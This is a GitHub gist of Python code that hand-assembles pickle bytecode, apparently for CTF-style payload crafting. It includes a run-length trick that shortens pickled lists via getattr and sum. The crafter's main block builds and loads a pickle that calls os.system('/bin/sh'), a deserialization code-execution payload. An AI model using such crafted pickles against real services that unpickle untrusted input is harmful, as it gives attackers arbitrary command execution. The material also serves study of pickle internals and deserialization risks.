Skip to content

Instantly share code, notes, and snippets.

@Xornet-Euphoria
Last active February 29, 2024 12:52
Show Gist options
  • Save Xornet-Euphoria/0691ebe626ed1f6dfcc24884fde59e41 to your computer and use it in GitHub Desktop.
Save Xornet-Euphoria/0691ebe626ed1f6dfcc24884fde59e41 to your computer and use it in GitHub Desktop.
Pickle bytecode optimization (with my own script for crafting payload)
import pickle
import pickletools
import payload_crafter
class RunLengthCrafter(payload_crafter.Crafter):
def __init__(self, *, check_stop=False) -> None:
super().__init__(check_stop=check_stop)
def create_single_element_list(self, x, length):
self.import_from("builtins", "getattr", use_stack=False)
self._single_element_list_internal(x, length, is_first=True)
return self
def _single_element_list_internal(self, x, length, memo_idx=0, is_first=False):
self.add_payload(pickle.EMPTY_LIST)
self.push_int(x)
self.add_payload(pickle.APPEND)
if is_first:
self.push_str("__mul__")
self.memoize()
else:
self.get_memo(memo_idx)
self.call_f(2)
self.push_int(length)
self.call_f(1)
return self
def create_run_length_single_element_list(self, x, length, memo_idx=0, is_first=False):
if is_first:
self.import_from("builtins", "getattr", use_stack=False)
self.memoize() # idx will be 0
else:
self.get_memo(memo_idx)
return self._single_element_list_internal(x, length, memo_idx=1, is_first=is_first)
# sum([l2, l3, ...], l1)
# -> l1 + l2 + l3 + ...
def run_length(self, t):
self.import_from("builtins", "sum", use_stack=False)
# if len(t) < 4 then using pickle.TUPLE<n> is more optimized than pickle.MARK and pickle.LIST
# note: sum([l2, l3, l4], l1) == sum((l2, l3, l4), l1)
self.add_payload(pickle.MARK)
for i, (x, length) in enumerate(t[1:]):
self.create_run_length_single_element_list(x, length, is_first=(i == 0))
self.add_payload(pickle.LIST)
x, length = t[0]
self.create_run_length_single_element_list(x, length)
self.call_f(2)
self.stop()
return self
def search_boundary_list():
for i in range(1, 256):
target = [1] * i
org_p = pickle.dumps(target)
crafter = RunLengthCrafter()
optimized_p = crafter.create_single_element_list(1, i).get_payload(check_stop=True)
assert pickle.loads(org_p) == pickle.loads(optimized_p)
if (l1 := len(optimized_p), l2 := len(org_p)) and l1 < l2:
print(f"boundary length: {i}")
print(f"- org: {l2}")
print(f"- opt: {l1}")
break
def test_run_length():
crafter = RunLengthCrafter()
from itertools import groupby
l = [0] * 0x40 + [1] * 0x20 + [2] * 0x10
t = [(x, len(list(y))) for x, y in groupby(l)]
crafter.run_length(t)
res = crafter.loads()
pickletools.dis(crafter.get_payload(check_stop=True))
print(crafter.get_length() + 1)
assert res == l
assert crafter.get_length() + 1 < len(pickle.dumps(l))
def test():
search_boundary_list()
print("=" * 40)
test_run_length()
if __name__ == "__main__":
test()
import pickle
class Crafter:
def __init__(self, *, check_stop=False) -> None:
self.payload = b""
self.check_stop = check_stop # reserved and not implemented yet
# self.payload += b の wrapperに過ぎないが、オーバーライドしてデバッグに使うといった用途を考えている
def add_payload(self, b: bytes):
self.payload += b
def push_int(self, n: int):
if n < 0:
raise NotImplementedError("positive only")
if n < 0x100:
self._push_int1(n)
return
if n < 0x10000:
self._push_int2(n)
return
# todo: 4byte integer
raise NotImplementedError("1 or 2 byte integer only")
def _push_int1(self, n: int):
self.add_payload(pickle.BININT1)
self._add_number1(n)
def _push_int2(self, n: int):
self.add_payload(pickle.BININT2)
self._add_number2(n)
def push_str(self, s: str):
length = len(s)
assert length < 2**32
if length < 0x100:
self.add_payload(pickle.SHORT_BINSTRING)
self._add_number1(length)
self.add_payload(s.encode())
return
self.add_payload(pickle.BINSTRING)
self.add_payload(length.to_bytes(4, "little"))
self.add_payload(s.encode())
# utils about list, tuple and dict
def to_tuple(self, cnt: int=0, use_mark: bool=False):
if cnt in range(0, 4) and not use_mark:
self.add_payload(pickle._tuplesize2code[cnt]) # type: ignore
else:
# todo: check whether MARK(@) is used in the payload
self.add_payload(pickle.TUPLE)
# utils about objects that is not pickle-native (import, function and etc)
def import_from(self, module: str, name: str, *, use_stack=True):
if use_stack:
self.push_str(module)
self.push_str(name)
self.add_payload(pickle.STACK_GLOBAL)
else:
# shorter than STACK_GLOBAL
# if other optimization techniques are used (for example, memoize frequently used strings)
# this method may not be effective
self.add_payload(pickle.GLOBAL)
self.add_payload(module.encode("utf-8"))
self._add_newline()
self.add_payload(name.encode("utf-8"))
self._add_newline()
def call_f(self, argc: int=0, use_mark=False):
self.to_tuple(argc, use_mark=use_mark)
self.reduce()
def reduce(self):
self.add_payload(pickle.REDUCE)
def stop(self):
self.add_payload(pickle.STOP)
# utils about memo
# todo: emulate memo and estimate index in memoize
# todo: put_memo
def memoize(self):
self.add_payload(pickle.MEMOIZE)
def get_memo(self, idx: int):
if idx < 0x100:
self.add_payload(pickle.BINGET)
self._add_number1(idx)
return
# todo: pickle.LONGBINGET
self.add_payload(pickle.GET)
self._add_number(idx)
self._add_newline()
# interfaces about payload
def get_payload(self, check_stop=False) -> bytes:
if check_stop:
if self.payload[-1] != ord(pickle.STOP):
self.stop()
return self.payload
def get_length(self, with_stop: bool=False) -> int:
l = len(self.payload)
return l + 1 if with_stop else l
def loads(self, check_stop=False):
_payload = self.get_payload(check_stop)
res = pickle.loads(_payload)
return res
def clear(self):
self.payload = b""
# utils for internal
def _add_newline(self):
self.add_payload(b"\n")
def _add_number(self, n: int):
self.add_payload(str(n).encode())
def _add_number1(self, n: int):
self._add_number_to_bytes(n, 1)
def _add_number2(self, n: int):
self._add_number_to_bytes(n, 2)
def _add_number4(self, n: int):
self._add_number_to_bytes(n, 4)
def _add_number_to_bytes(self, n: int, length: int):
self.add_payload(n.to_bytes(length, "little"))
if __name__ == "__main__":
payload = Crafter()
payload.import_from("os", "system", use_stack=False)
payload.push_str("/bin/sh")
payload.call_f(1)
pb = payload.get_payload(check_stop=True)
print(len(pb))
r = pickle.loads(pb)
print(r)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment